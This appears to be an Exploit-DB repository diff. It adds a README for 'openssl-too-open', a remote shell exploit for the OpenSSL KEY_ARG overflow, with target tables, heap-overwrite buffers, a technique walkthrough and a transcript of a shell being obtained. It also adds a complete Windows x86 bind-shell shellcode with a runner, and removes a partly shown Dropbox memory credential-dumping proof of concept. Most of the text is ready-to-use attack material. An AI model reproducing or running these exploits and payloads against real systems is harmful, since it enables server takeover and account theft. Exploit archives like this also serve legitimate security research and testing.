Zillion, Dvorak and Black Berry for their help. + * + * This code or any derivative versions of it may not be posted to Bugtraq + * or anywhere on SecurityFocus, Symantec or any affiliated site. + * + */ + +---------[ ./openssl-too-open ] + +openssl-too-open is a remote exploit for the KEY_ARG overflow in +OpenSSL 0.9.6d and older. It will give you a remote shell with the +priviledges of the server process (nobody when used against Apache, +root against other servers). + +Only Linux/x86 targets are supported. + +: openssl-too-open : OpenSSL remote exploit + by Solar Eclipse + +Usage: ./openssl-too-open [options] + -a target architecture (default is 0x00) + -p SSL port (default is 443) + -c open N apache connections before sending the shellcode (default is 30) + -m maximum number of open connections (default is 50) + -v verbose mode + +Supported architectures: + 0x00 - Gentoo (apache-1.3.24-r2) + 0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1) + 0x02 - Slackware 7.0 (apache-1.3.26) + 0x03 - Slackware 8.1-stable (apache-1.3.26) + 0x04 - RedHat Linux 6.0 (apache-1.3.6-7) + 0x05 - RedHat Linux 6.1 (apache-1.3.9-4) + 0x06 - RedHat Linux 6.2 (apache-1.3.12-2) + 0x07 - RedHat Linux 7.0 (apache-1.3.12-25) + 0x08 - RedHat Linux 7.1 (apache-1.3.19-5) + 0x09 - RedHat Linux 7.2 (apache-1.3.20-16) + 0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP) + 0x0b - RedHat Linux 7.3 (apache-1.3.23-11) + 0x0c - SuSE Linux 7.0 (apache-1.3.12) + 0x0d - SuSE Linux 7.1 (apache-1.3.17) + 0x0e - SuSE Linux 7.2 (apache-1.3.19) + 0x0f - SuSE Linux 7.3 (apache-1.3.20) + 0x10 - SuSE Linux 8.0 (apache-1.3.23-137) + 0x11 - SuSE Linux 8.0 (apache-1.3.23) + 0x12 - Mandrake Linux 7.1 (apache-1.3.14-2) + 0x13 - Mandrake Linux 8.0 (apache-1.3.19-3) + 0x14 - Mandrake Linux 8.1 (apache-1.3.20-3) + 0x15 - Mandrake Linux 8.2 (apache-1.3.23-4) + +Examples: ./openssl-too-open -a 0x01 -v localhost + ./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80 + + +---------[ ./openssl-scanner ] + +openssl-scanner scans a number of hosts for vulnerable OpenSSL +implementations. + +: openssl-scanner : OpenSSL vulnerability scanner + by Solar Eclipse + +Usage: ./openssl-scanner [options] + -i file with target hosts + -o output log + -a append to output log (requires -o) + -b check for big endian servers + -C scan the entire class C network the host belogs to + -d debug mode + -w N connection timeout in seconds + +Examples: ./openssl-scanner -d 192.168.0.1 + ./openssl-scanner -i hosts -o my.log -w 5 + + +---------[ Screenshots ] + +$ ./openssl-scanner -C 192.168.0.0 +: openssl-scanner : OpenSSL vulnerability scanner + by Solar Eclipse + +Opening 255 connections . . . . . . . . . . done +Waiting for all connections to finish . . . . . . . . . . . done + +192.168.0.136: Vulnerable + + +$ nc 192.168.0.1 80 +HEAD / HTTP/1.0 + +HTTP/1.1 200 OK +Date: Tue, 17 Sep 2002 17:47:44 GMT +Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b +Connection: close +Content-Type: text/html + + +./openssl-too-open -a 0x14 192.168.0.1 +: openssl-too-open : OpenSSL remote exploit + by Solar Eclipse + +: Opening 30 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x810b3a0 + ssl1 : 0x810b360 + ssl2 : 0x810b4e0 + +* Addresses don't match. + +: Opening 40 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x8103830 + ssl1 : 0x80fd668 + ssl2 : 0x80fd668 + +* Addresses don't match. + +: Opening 50 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x8103830 + ssl1 : 0x8103830 + ssl2 : 0x8103830 + +: Sending shellcode +ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184 + Reading tag + Execution of stage1 shellcode succeeded, sending stage2 + Spawning shell... + +bash: no job control in this shell +bash-2.05$ +bash-2.05$ uname -a; id; w; +Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown +uid=48(apache) gid=48(apache) groups=48(apache) + 1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +bash-2.05$ + + +---------[ How Does openssl-too-open Work? ] + +It is important to understand the SSL2 handshake in order to successfully +exploit the KEY_ARG vulnerability. + +---/ Typical SSL2 Handshake + + + Client Server + + CLIENT_HELLO --> + + <-- SERVER_HELLO + +CLIENT_MASTER_KEY --> + + <-- SERVER_VERIFY + + CLIENT_FINISHED --> + + <-- SERVER_FINISHED + +The CLIENT_HELLO message contains a list of the ciphers the client supports, +a session id and some challenge data. The session id is used if the client +wishes to reuse an already established session, otherwise it's empty. + +The server replies with a SERVER_HELLO message, also listing all supported +ciphers and includes a certificate with its public RSA key. The server +also sends a connection id, which will later be used by the client to +verify that the encryption works. + +The client generates a random master key, encrypts it with the server's +public key and sends it with a CLIENT_MASTER_KEY message. This message +also specifies the cipher selected by the client and a KEY_ARG field, +which meaning depends on the specified cipher. For DES-CBC ciphers, the +KEY_ARG contains the initialization vector. + +Now both the client and the server have the master key and they can generate +the session keys from it. All messages from this point on are encrypted. + +The server replies with a SERVER_VERIFY message, containing the challenge +data from the CLIENT_HELLO message. If the key exchange has been successful, +the client will be able to decrypt this message and the challenge data returned +from the server will match the challenge data sent by the client. + +The client sends a CLIENT_FINISHED message with a copy of the connection id +from the SERVER_HELLO packet. It is now the server's turn to decrypt this +message and check if the connection id returned by the client matches the +connection it sent by the server. + +Finally the server sends a SERVER_FINISHED message, completing the handshake. +This message contains a session id, generated by the server. If the client +wishes to reuse the session later, it can send this session id with the +CLIENT_HELLO message. + + +---/ The KEY_ARG Buffer Overflow + +The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This +function reads a CLIENT_MASTER_KEY packet and processes it. It reads the +KEY_ARG_LENGTH value from the client and then copies that many bytes in an +array of a fixed size. This array is part of the SSL_SESSION structure. +If the client specifies a KEY_ARG longer than 8 bytes, the variables in the +SSL_SESSION structure can be overwritten with user supplied data. + +Let's look at the definition of this structure. + +typedef struct ssl_session_st + { + int ssl_version; /* what ssl version session info is + * being kept in here? */ + + /* only really used in SSLv2 */ + unsigned int key_arg_length; + unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH]; + int master_key_length; + unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; + /* session_id - valid? */ + unsigned int session_id_length; + unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; + /* this is used to determine whether the session is being reused in + * the appropriate context. It is up to the application to set this, + * via SSL_new */ + unsigned int sid_ctx_length; + unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; + + int not_resumable; + + /* The cert is the certificate used to establish this connection */ + struct sess_cert_st /* SESS_CERT */ *sess_cert; + + /* This is the cert for the other end. + * On clients, it will be the same as sess_cert->peer_key->x509 + * (the latter is not enough as sess_cert is not retained + * in the external representation of sessions, see ssl_asn1.c). */ + X509 *peer; + /* when app_verify_callback accepts a session where the peer's certificate + * is not ok, we must remember the error for session reuse: */ + long verify_result; /* only for servers */ + + int references; + long timeout; + long time; + + int compress_meth; /* Need to lookup the method */ + + SSL_CIPHER *cipher; + unsigned long cipher_id; /* when ASN.1 loaded, this + * needs to be used to load + * the 'cipher' structure */ + + STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */ + + CRYPTO_EX_DATA ex_data; /* application specific data */ + + /* These are used to make removal of session-ids more + * efficient and to implement a maximum cache size. */ + struct ssl_session_st *prev,*next; + } SSL_SESSION; + +It really looks better with VIM coloring. Anyway, we know the size of the +structure and it's allocated on the heap. The first thing that comes to +mind is to overwrite the next malloc chunk and then make the OpenSSL code +call free() on the SSL_SESSION structure. + +After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet +from the server and then we'll respond with a CLIENT_FINISHED message. +The server uses this the contents of this message to verify that the +key exchange succeeded. If we return a wrong connection id, the server +will abort the connection and free the SSL_SESSION structure, which is +exactly what we want. + +We'll overwrite the KEY_ARG array with 8 random bytes and the following +string: + +unsigned char overwrite_next_chunk[] = + "AAAA" /* int master_key_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */ + "AAAA" /* unsigned int session_id_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */ + "AAAA" /* unsigned int sid_ctx_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */ + "AAAA" /* unsigned int sid_ctx_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */ + "AAAA" /* int not_resumable; */ + "\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */ + "\x00\x00\x00\x00" /* X509 *peer; */ + "AAAA" /* long verify_result; */ + "\x01\x00\x00\x00" /* int references; */ + "AAAA" /* int timeout; */ + "AAAA" /* int time */ + "AAAA" /* int compress_meth; */ + "\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */ + "AAAA" /* unsigned long cipher_id; */ + "\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */ + "AAAAAAAA" /* struct ssl_session_st *prev,*next; */ + "\x00\x00\x00\x00" /* Size of previous chunk */ + "\x11\x00\x00\x00" /* Size of chunk, in bytes */ + "fdfd" /* Forward and back pointers */ + "bkbk" + "\x10\x00\x00\x00" /* Size of previous chunk */ + "\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */ + +The "A" bytes don't affect the OpenSSL control flow. The other bytes must be +set to specific values to make the exploit work. For example, the peer and +sess_cert pointers must be NULL, because the SSL cleanup code will call +free() on them before it frees the SSL_SESSION structure. + +The free() call will write the value of the bk pointer to the memory +address in the fd pointer + 12 bytes. We'll put our shellcode address +in the bk pointer and we'll write it to the free() entry in the GOT +table. + +If you don't understand how freeing this malloc chunk overwrites the GOT +entry or don't know what the GOT table is, visit juliano's site at +http://community.core-sdi.com/~juliano/ and read some papers. + + +---/ Getting the Shellcode Address + +There is only one little problem. We need a place to put our shellcode +and we need the exact shellcode address. The trick is to use the +SERVER_FINISHED message. This message includes the session id, which +is read from the SSL_SESSION structure. The server reads session_id_length +bytes from the session_id[] array and sends them to the client. We can +overwrite the session_id_length variable and complete the handshake. +If session_id_length is long enough, the SERVER_FINISHED message will +include the contents of the SSL_SESSION structure. + +To get the contents of the session structure, we'll overwrite the +KEY_ARG array with 8 random bytes and the following string: + +unsigned char overwrite_session_id_length[] = + "AAAA" /* int master_key_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */ + "\x70\x00\x00\x00"; /* unsigned int session_id_length; */ + +Now let's imagine the heap state when we send our connection request. +We have a heap, which contains some allocated chunks of memory and a +large 'top' chunk, covering all free memory. + +When the server receives the connection, it forks a child and the child +allocates the SSL_SESSION structure. If there has not been a signifficant +malloc/free activity, the fragmentation of the memory will be low and the +new chunk will be allocated from the beginning of the 'top' chunk. + +The next allocated chunk is a 16 bytes chunk which holds a +STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the +beginning of the 'top' chunk, so it's located right above the SSL_SESSION +structure. The address of this chunk is stored in the session->ciphers +variable. + +If we're lucky, the memory would look like this: + + | top chunk | + |-----------| +session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure +points here -> |-----------| + | 368 bytes | <- SSL_SESSION structure + |-----------| + +We can read the session->ciphers pointer from the SSL_SESSION structure +in the SERVER_FINISHED message. By subtracting 368 from it, we'll get +the address of the SSL_SESSION structure, and thus the address of +the data we've overwritten. + + +---/ fork() Is Your Friend + +We'll use the same buffer overflow to get the address of the shellcode +and to overwrite the malloc chunks. The problem is that we need to +know the shellcode address before we send it to the server. + +The only solution is to send 2 requests. The first request overwrites +session_id_length and we complete the handshake to get the SERVER_FINISHED +message. Then we adjust our shellcode and open a second connection +which we use to send it. + +If we're dealing with a forking server like Apache, the two children +will have an identical memory layout and malloc() will put the +session structure at the same address. Of course, life is never that +simple. Apache children can handle multiple requests, which would +change the memory allocation pattern of the two children we use. + +To guarantee that both children are freshly spawned, our exploit +will open a number of connections to the server before sending the +two important requests. These connection should use up all available +Apache children and force new ones to be spawned. + +If the server traffic is high, the exploit might fail. If the +memory allocation patterns are different, the exploit might fail. +If you have a wrong GOT address, the exploit will definitely fail. + + +---------[ How Does openssl-too-open Work? ] + +openssl-scanner overflows the master_key_length, master_key[] and session_id_length +variables in the SSL_SESSION structure. The first two are uninitialized at this point, +so overwriting them has no effect on openssl. The first place where the session_id_length +variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847) + +memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length); + +This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length +of the data. If it matches the value we set session_id_length to, then the server is +exploitable. + +OpenSSL 0.9.6e and higher versions return +192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable. + +The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b +or some other version of OpenSSL. They don't return an error like 0.9.6e. +The updated RedHat and Debian packages) would close the connection immediatelly +after they receive the oversized KEY_ARG data, causing openssl-scanner to report + +192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable. + +IIS servers exhibit the same behavior. + +IIS servers that don't have a certificate set up close the connection as soon as +they receive the CLIENT_HELLO packet. openssl-scanner reports this as + +192.168.0.2: Connection unexpectedly closed + + +/* EOF */ + + + + +http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file diff --git a/platforms/linux/remote/764.c b/platforms/unix/remote/764.c similarity index 95% rename from platforms/linux/remote/764.c rename to platforms/unix/remote/764.c index bc83a3384..595a9f2b6 100755 --- a/platforms/linux/remote/764.c +++ b/platforms/unix/remote/764.c @@ -1,5 +1,5 @@ /* - * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ + * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ * * OF version r00t VERY PRIV8 spabam * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto diff --git a/platforms/win_x86/shellcode/40352.c b/platforms/win_x86/shellcode/40352.c new file mode 100755 index 000000000..240ea66f9 --- /dev/null +++ b/platforms/win_x86/shellcode/40352.c @@ -0,0 +1,519 @@ +/* + # Title : Windows x86 bind shell tcp shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 08-09-2016 + # Tested On : Windows 7 Ultimate , Starter x86 +*/ + +//Note: This shellcode will only works on x86 + +/* +section .text + global _start +_start: + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;PEB +mov eax,[eax+0xc] ;PEB.Ldr +mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov edi,[eax+0x10] ;kernel32.dll base address + + +mov ebx,[edi+0x3c] ;DOS->elf_anew +add ebx,edi ;PE HEADER +mov ebx,[ebx+0x78] +add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY + + +sub esp,32 +lea esi,[esp] + + +mov cx,660 + +mov edx,[ebx+0x1c] ;AddressOfFunctions +add edx,edi + +mov eax,[edx+ecx] +add eax,edi + +mov [esi],dword eax ;CreateProcessA() at offset 0 + +mov cx,1128 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+4],dword eax ;ExitProcess() at offset 4 + +;------------------------------------ +;finding base address of ws2_32.dll + +mov cx,3312 + +mov eax,[edx+ecx] +add eax,edi + +xor ecx,ecx +push 0x41416c6c +mov [esp+2],word cx +push 0x642e3233 +push 0x5f327377 + +lea ebx,[esp] + +push ebx +call eax + +;--------------------------- +mov edi,eax +;--------------------- +mov ebx,[edi+0x3c] ;DOS->elf_anew +add ebx,edi ;PE HEADER +mov ebx,[ebx+0x78] +add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY + +mov edx,[ebx+0x1c] ;AddressOfFunctions +add edx,edi + +xor ecx,ecx +mov cx,456 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+8],dword eax ;WSAStartup() at offset 8 + +mov cx,392 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+12],dword eax ;WSASocketA() at offset 12 + + +mov eax,[edx+4] +add eax,edi + +mov [esi+16],dword eax ;bind() at offset 16 + +mov eax,[edx+48] +add eax,edi + +mov [esi+20],dword eax ;listen() at offset 20 + +mov eax,[edx] +add eax,edi + +mov [esi+24],dword eax ;accept() at offset 24 + +mov eax,[edx+80] +add eax,edi + +mov [esi+28],dword eax ;setsockopt() at offset 28 +;------------------------------------------------- +;WSAStartup(514, &WSADATA) +mov cx,400 +sub esp,ecx + +lea ebx,[esp] + +mov cx,514 + +push ebx +push ecx + +call dword [esi+8] + + +;----------------------------------------- +;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL) + +xor ecx,ecx + +push ecx +push ecx +push ecx + +mov cl,6 +push ecx + +sub ecx,5 +push ecx + +inc ecx +push ecx + +call dword [esi+12] +;---------------------------- +mov edi,eax ;SOCKET + +;---------------------------------- +;setsockopt(sock,0xffff,4,&int l=1,int j=2) + +cdq +mov dl,2 + +push edx +dec edx + +push edx +lea ecx,[esp] + +mov dl,4 + +push ecx +push edx + +mov dx,0xffff +push edx +push edi + +call dword [esi+28] + + +;-------------------------------------------- +;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16); + +cdq + +push edx +push edx +push edx +push edx + +mov [esp],byte 2 +mov [esp+2],word 0x5c11 ;port 4444 + +lea ecx,[esp] +mov dl,16 + +push edx +push ecx +push edi + +call dword [esi+16] + +;-------------------------------- +;listen(SOCKET,1); +cdq +inc edx +push edx +push edi + +call dword [esi+20] +;----------------------------- +;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16); + +cdq +push edx +push edx +push edx +push edx +mov dl,16 +lea ecx,[esp] + + + +push edx +lea ebx,[esp] + +push ebx +push ecx +push edi + +call dword [esi+24] +;----------------------- +mov edi,eax ;CLIent socket +;----------------------- + +cdq +sub esp,16 +lea ebx,[esp] ;PROCESS_INFORMATION + +push edi +push edi +push edi +push edx + +push edx + +mov dl,255 +inc edx + +push edx +cdq + +push edx +push edx +push edx +push edx +push edx + +push edx +push edx +push edx +push edx +push edx + +mov dl,68 +push edx + +lea ecx,[esp] ;STARTUPINFOA + +cdq +push 0x41657865 +mov [esp+3],byte dl +push 0x2e646d63 + +lea eax,[esp] + +;--------------------------------------------- +;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION) + +push ebx +push ecx + +push edx +push edx +push edx + +inc edx +push edx +cdq + +push edx +push edx + +push eax +push edx + +call dword [esi] +;----------------------- +push eax +call dword [esi+4] + +*/ + + +/* + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 78 10 mov 0x10(%eax),%edi + 12: 8b 5f 3c mov 0x3c(%edi),%ebx + 15: 01 fb add %edi,%ebx + 17: 8b 5b 78 mov 0x78(%ebx),%ebx + 1a: 01 fb add %edi,%ebx + 1c: 83 ec 20 sub $0x20,%esp + 1f: 8d 34 24 lea (%esp),%esi + 22: 66 b9 94 02 mov $0x294,%cx + 26: 8b 53 1c mov 0x1c(%ebx),%edx + 29: 01 fa add %edi,%edx + 2b: 8b 04 0a mov (%edx,%ecx,1),%eax + 2e: 01 f8 add %edi,%eax + 30: 89 06 mov %eax,(%esi) + 32: 66 b9 68 04 mov $0x468,%cx + 36: 8b 04 0a mov (%edx,%ecx,1),%eax + 39: 01 f8 add %edi,%eax + 3b: 89 46 04 mov %eax,0x4(%esi) + 3e: 66 b9 f0 0c mov $0xcf0,%cx + 42: 8b 04 0a mov (%edx,%ecx,1),%eax + 45: 01 f8 add %edi,%eax + 47: 31 c9 xor %ecx,%ecx + 49: 68 6c 6c 41 41 push $0x41416c6c + 4e: 66 89 4c 24 02 mov %cx,0x2(%esp) + 53: 68 33 32 2e 64 push $0x642e3233 + 58: 68 77 73 32 5f push $0x5f327377 + 5d: 8d 1c 24 lea (%esp),%ebx + 60: 53 push %ebx + 61: ff d0 call *%eax + 63: 89 c7 mov %eax,%edi + 65: 8b 5f 3c mov 0x3c(%edi),%ebx + 68: 01 fb add %edi,%ebx + 6a: 8b 5b 78 mov 0x78(%ebx),%ebx + 6d: 01 fb add %edi,%ebx + 6f: 8b 53 1c mov 0x1c(%ebx),%edx + 72: 01 fa add %edi,%edx + 74: 31 c9 xor %ecx,%ecx + 76: 66 b9 c8 01 mov $0x1c8,%cx + 7a: 8b 04 0a mov (%edx,%ecx,1),%eax + 7d: 01 f8 add %edi,%eax + 7f: 89 46 08 mov %eax,0x8(%esi) + 82: 66 b9 88 01 mov $0x188,%cx + 86: 8b 04 0a mov (%edx,%ecx,1),%eax + 89: 01 f8 add %edi,%eax + 8b: 89 46 0c mov %eax,0xc(%esi) + 8e: 8b 42 04 mov 0x4(%edx),%eax + 91: 01 f8 add %edi,%eax + 93: 89 46 10 mov %eax,0x10(%esi) + 96: 8b 42 30 mov 0x30(%edx),%eax + 99: 01 f8 add %edi,%eax + 9b: 89 46 14 mov %eax,0x14(%esi) + 9e: 8b 02 mov (%edx),%eax + a0: 01 f8 add %edi,%eax + a2: 89 46 18 mov %eax,0x18(%esi) + a5: 8b 42 50 mov 0x50(%edx),%eax + a8: 01 f8 add %edi,%eax + aa: 89 46 1c mov %eax,0x1c(%esi) + ad: 66 b9 90 01 mov $0x190,%cx + b1: 29 cc sub %ecx,%esp + b3: 8d 1c 24 lea (%esp),%ebx + b6: 66 b9 02 02 mov $0x202,%cx + ba: 53 push %ebx + bb: 51 push %ecx + bc: ff 56 08 call *0x8(%esi) + bf: 31 c9 xor %ecx,%ecx + c1: 51 push %ecx + c2: 51 push %ecx + c3: 51 push %ecx + c4: b1 06 mov $0x6,%cl + c6: 51 push %ecx + c7: 83 e9 05 sub $0x5,%ecx + ca: 51 push %ecx + cb: 41 inc %ecx + cc: 51 push %ecx + cd: ff 56 0c call *0xc(%esi) + d0: 89 c7 mov %eax,%edi + d2: 99 cltd + d3: b2 02 mov $0x2,%dl + d5: 52 push %edx + d6: 4a dec %edx + d7: 52 push %edx + d8: 8d 0c 24 lea (%esp),%ecx + db: b2 04 mov $0x4,%dl + dd: 51 push %ecx + de: 52 push %edx + df: 66 ba ff ff mov $0xffff,%dx + e3: 52 push %edx + e4: 57 push %edi + e5: ff 56 1c call *0x1c(%esi) + e8: 99 cltd + e9: 52 push %edx + ea: 52 push %edx + eb: 52 push %edx + ec: 52 push %edx + ed: c6 04 24 02 movb $0x2,(%esp) + f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp) + f8: 8d 0c 24 lea (%esp),%ecx + fb: b2 10 mov $0x10,%dl + fd: 52 push %edx + fe: 51 push %ecx + ff: 57 push %edi + 100: ff 56 10 call *0x10(%esi) + 103: 99 cltd + 104: 42 inc %edx + 105: 52 push %edx + 106: 57 push %edi + 107: ff 56 14 call *0x14(%esi) + 10a: 99 cltd + 10b: 52 push %edx + 10c: 52 push %edx + 10d: 52 push %edx + 10e: 52 push %edx + 10f: b2 10 mov $0x10,%dl + 111: 8d 0c 24 lea (%esp),%ecx + 114: 52 push %edx + 115: 8d 1c 24 lea (%esp),%ebx + 118: 53 push %ebx + 119: 51 push %ecx + 11a: 57 push %edi + 11b: ff 56 18 call *0x18(%esi) + 11e: 89 c7 mov %eax,%edi + 120: 99 cltd + 121: 83 ec 10 sub $0x10,%esp + 124: 8d 1c 24 lea (%esp),%ebx + 127: 57 push %edi + 128: 57 push %edi + 129: 57 push %edi + 12a: 52 push %edx + 12b: 52 push %edx + 12c: b2 ff mov $0xff,%dl + 12e: 42 inc %edx + 12f: 52 push %edx + 130: 99 cltd + 131: 52 push %edx + 132: 52 push %edx + 133: 52 push %edx + 134: 52 push %edx + 135: 52 push %edx + 136: 52 push %edx + 137: 52 push %edx + 138: 52 push %edx + 139: 52 push %edx + 13a: 52 push %edx + 13b: b2 44 mov $0x44,%dl + 13d: 52 push %edx + 13e: 8d 0c 24 lea (%esp),%ecx + 141: 99 cltd + 142: 68 65 78 65 41 push $0x41657865 + 147: 88 54 24 03 mov %dl,0x3(%esp) + 14b: 68 63 6d 64 2e push $0x2e646d63 + 150: 8d 04 24 lea (%esp),%eax + 153: 53 push %ebx + 154: 51 push %ecx + 155: 52 push %edx + 156: 52 push %edx + 157: 52 push %edx + 158: 42 inc %edx + 159: 52 push %edx + 15a: 99 cltd + 15b: 52 push %edx + 15c: 52 push %edx + 15d: 50 push %eax + 15e: 52 push %edx + 15f: ff 16 call *(%esi) + 161: 50 push %eax + 162: ff 56 04 call *0x4(%esi) +*/ + + +#include +#include +#include +#include + +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04"; + +int main(int i,char *a[]) +{ + + int mode; + + + + if(i==1) + mode=1; + else + mode=atoi(a[1]); + +switch(mode) +{ + case 1: + ShellExecute(NULL,NULL,a[0],"78",NULL,0); + break; + + case 78: + (* (int(*)())shellcode )(); + break; + + default: + break; +} + + +return 0; +} diff --git a/platforms/windows/local/40341.txt b/platforms/windows/local/40341.txt deleted file mode 100755 index 7ee6c15d2..000000000 --- a/platforms/windows/local/40341.txt +++ /dev/null @@ -1,242 +0,0 @@ -##### -# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure -# Tested on Windows Windows Server 2012 R2 64bit, English -# Vendor Homepage @ https://www.dropbox.com -# Date 06/09/2016 -# Bug Discovery by: -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -##### -# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. -# A potential attacker could reveal the supplied username and password in order to gain access to account. -##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -username = '' -password = '' -found = 0 -filename = "Dropbox.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "[~] Searching for pid by process name '%s'.." % (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in 